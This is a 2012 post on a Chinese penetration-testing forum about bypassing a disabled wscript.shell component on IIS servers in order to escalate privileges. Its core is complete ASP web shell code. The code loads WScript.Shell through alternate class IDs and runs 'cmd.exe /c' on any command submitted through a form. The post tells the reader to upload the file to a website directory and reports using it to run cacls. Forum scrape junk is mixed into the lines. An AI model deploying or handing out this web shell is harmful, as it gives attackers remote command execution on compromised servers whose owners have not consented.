中国网络渗透测试联盟

标题: wscript.shell删除解决办法 [打印本页]

---

作者: admin    时间: 2012-9-15 14:36
标题: wscript.shell删除解决办法
可能有很多人，看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
一般当闭上面组件时，你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
2 l5 F, Z; \1 U% V- ^! |要想让运行命令可以试试这种方法，成功率为五五之数。
把下面代码复制：
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<%if err then%>
- \# [8 q' V8 t$ c6 @  N<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
, E: l6 p6 g9 ]& a' U& V9 w( x$ n<%
* N& |7 r, a; i0 Lend if
response.write("<textarea readonly cols=80 rows=20>")
% ~3 k6 a# y( O9 M  g- _$ }On Error Resume Next
% l. x; R( n, o! M2 F5 z0 C! [response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
response.write("</textarea>")
( z) p. @" d2 Zresponse.write("<form method='post'>")
' F( \  m; x& d/ d3 S, A, Xresponse.write("<input type=text name='c' size=60><br>")
response.write("<input type=submit value='执行'></form>")
" \3 v. ^" R) d7 p, \/ Y%>
% K! h- _2 y- I. Y' R3 e
保存为一个asp文件，然后传到网站目录上去
运行的时候可能会出现两个问题，第一是运行了为什么运行不了命令，这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
8 S  D1 j, [% D: [  u! E我用此成功运行过cacls命令。
/ Q% r9 d# E. d, c8 v* u% A
0 c, ~% v4 ~+ {" u+ g$ t1 |/ E第二那就是运行时出错，可能限制某些代码执行

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2